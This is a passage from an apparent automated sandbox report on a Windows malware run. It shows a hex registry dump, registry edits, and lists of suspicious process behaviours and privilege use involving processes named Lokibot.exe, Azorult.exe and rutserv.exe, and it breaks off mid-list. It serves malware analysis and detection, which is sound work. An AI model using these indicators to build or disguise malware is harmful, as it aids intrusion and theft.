000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000073ae2078e323294282c1e41cb67d5b9c0000000000000000000000007d7c15f6f8edd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b0031004e005000310034005200370037002d0030003200520037002d0034005200350051002d004f003700340034002d00320052004f0031004e00520035003100390038004f0037007d005c0047006e00660078007a00740065002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e5070c00500043004800200031003000300025000d000a005a0072007a00620065006c0020003300320025000d000a0051007600660078002000380025000d000a004100720067006a0062006500780020003000250000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000000000000000000000000000000000000000000000000000000000000c04aabf8f8edd70100000000000000000000000047006e006600780020005a006e0061006e0074007200650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e5070c004100720067006a006200650078002000200033000a004100620020005600610067007200650061007200670020006e00700070007200660066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000ffffffff74ae2078e323294282c1e41cb67d5b9c00000000000000000000000032c729ea4cecd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e5070c004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000006f514f2747ecd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d0000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e5070c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e5070c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\3 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\0\NodeSlot = "17" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} explorer.exe -
Modifies registry key 1 TTPs 3 IoCs
-
NTFS ADS 1 IoCs
Processes:
taskhostw.exedescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 4196 regedit.exe 3860 regedit.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
explorer.exeWINWORD.EXEpid process 1824 explorer.exe 1040 WINWORD.EXE 1040 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exetaskmgr.exechrome.exechrome.exechrome.exetaskmgr.exepid process 860 chrome.exe 860 chrome.exe 2736 chrome.exe 2736 chrome.exe 3884 chrome.exe 3884 chrome.exe 2064 chrome.exe 2064 chrome.exe 1488 chrome.exe 1488 chrome.exe 3176 chrome.exe 3176 chrome.exe 888 chrome.exe 888 chrome.exe 1232 chrome.exe 1232 chrome.exe 1292 chrome.exe 1292 chrome.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 3532 chrome.exe 3532 chrome.exe 1896 taskmgr.exe 1896 taskmgr.exe 3664 chrome.exe 3664 chrome.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1244 chrome.exe 1244 chrome.exe 1244 chrome.exe 1244 chrome.exe 2980 taskmgr.exe 2980 taskmgr.exe 2980 taskmgr.exe 2980 taskmgr.exe 2980 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
taskmgr.exeexplorer.exetaskhostw.exepid process 2980 taskmgr.exe 1824 explorer.exe 5200 taskhostw.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 624 624 624 624 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes:
chrome.exepid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
Conhost.exepid process 4992 Conhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exetaskmgr.exehelper.exeSystemSettings.exefirefox.exeLokibot.exerutserv.exerutserv.exerutserv.exeexplorer.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1896 taskmgr.exe Token: SeSystemProfilePrivilege 1896 taskmgr.exe Token: SeCreateGlobalPrivilege 1896 taskmgr.exe Token: 33 1896 taskmgr.exe Token: SeIncBasePriorityPrivilege 1896 taskmgr.exe Token: SeDebugPrivilege 2980 taskmgr.exe Token: SeSystemProfilePrivilege 2980 taskmgr.exe Token: SeCreateGlobalPrivilege 2980 taskmgr.exe Token: SeDebugPrivilege 4156 helper.exe Token: SeDebugPrivilege 4156 helper.exe Token: SeShutdownPrivilege 4308 SystemSettings.exe Token: SeCreatePagefilePrivilege 4308 SystemSettings.exe Token: SeShutdownPrivilege 4308 SystemSettings.exe Token: SeCreatePagefilePrivilege 4308 SystemSettings.exe Token: SeDebugPrivilege 4324 firefox.exe Token: SeDebugPrivilege 4324 firefox.exe Token: SeDebugPrivilege 3620 Lokibot.exe Token: SeDebugPrivilege 3952 rutserv.exe Token: SeDebugPrivilege 4812 rutserv.exe Token: SeTakeOwnershipPrivilege 4352 rutserv.exe Token: SeTcbPrivilege 4352 rutserv.exe Token: SeTcbPrivilege 4352 rutserv.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeDebugPrivilege 3516 taskkill.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe Token: SeShutdownPrivilege 1824 explorer.exe Token: SeCreatePagefilePrivilege 1824 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe 1896 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
BabylonNG_setup.exesetup.exefirefox.exeSystemSettings.exeAzorult.exewini.exewinit.exerutserv.exerutserv.execheat.exeink.exerutserv.exetaskhost.exerutserv.exeP.exeR8.exeSearchUI.exeShellExperienceHost.exewinlogon.exetaskhostw.exeexplorer.exewinlogon.exeaudiodg.exeMicrosoftHost.exeWINWORD.EXEpid process 1200 BabylonNG_setup.exe 1264 setup.exe 1264 setup.exe 1264 setup.exe 1264 setup.exe 4324 firefox.exe 4308 SystemSettings.exe 2816 Azorult.exe 4140 wini.exe 5056 winit.exe 3952 rutserv.exe 4832 rutserv.exe 4728 cheat.exe 4864 ink.exe 4812 rutserv.exe 4380 taskhost.exe 4352 rutserv.exe 4620 P.exe 5096 R8.exe 3456 SearchUI.exe 3312 ShellExperienceHost.exe 3312 ShellExperienceHost.exe 3920 winlogon.exe 5200 taskhostw.exe 1824 explorer.exe 1824 explorer.exe 7020 winlogon.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 948 audiodg.exe 4628 MicrosoftHost.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1040 WINWORD.EXE 1040 WINWORD.EXE 1040 WINWORD.EXE 1040 WINWORD.EXE 1040 WINWORD.EXE 1040 WINWORD.EXE 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 2736 wrote to memory of 2740 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 2740 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3708 